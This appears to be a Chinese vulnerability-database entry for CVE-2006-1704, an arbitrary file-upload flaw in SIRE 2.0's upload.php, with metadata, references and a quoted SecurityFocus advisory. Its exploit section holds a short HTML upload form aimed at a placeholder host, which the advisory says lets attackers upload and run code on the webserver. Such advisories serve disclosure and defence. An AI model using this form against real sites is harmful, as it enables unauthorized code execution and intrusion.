SIRE upload.php 文件上传漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110031 漏洞类型 输入验证
发布时间 2006-04-10 更新时间 2006-04-14
CVE编号 CVE-2006-1704 CNNVD-ID CNNVD-200604-127
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/27592
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-127
|漏洞详情
Sire2.0nws允许远程攻击者借助于对upload.php页面的直接请求上传未经过验证的任意图像文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/17431/info

SIRE is prone to an arbitrary file-upload vulnerability. 

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

<form enctype="multipart/form-data" method="post" action="http://Trajet/upload.php?"> Download File<br>

<input name="fichier" type="file" size="48"><br>
<input type="submit" name="upload" value="uploader"><form>
|参考资料

来源:BID
名称:17431
链接:http://www.securityfocus.com/bid/17431
来源:BUGTRAQ
名称:20060407Sire2.0NwsRemoteFileinclusion&ArbitaryFilesUpload
链接:http://www.securityfocus.com/archive/1/archive/1/430301/100/0/threaded
来源:XF
名称:sire-upload-auth-bypass(25727)
链接:http://xforce.iss.net/xforce/xfdb/25727
来源:SECTRACK
名称:1015885
链接:http://securitytracker.com/id?1015885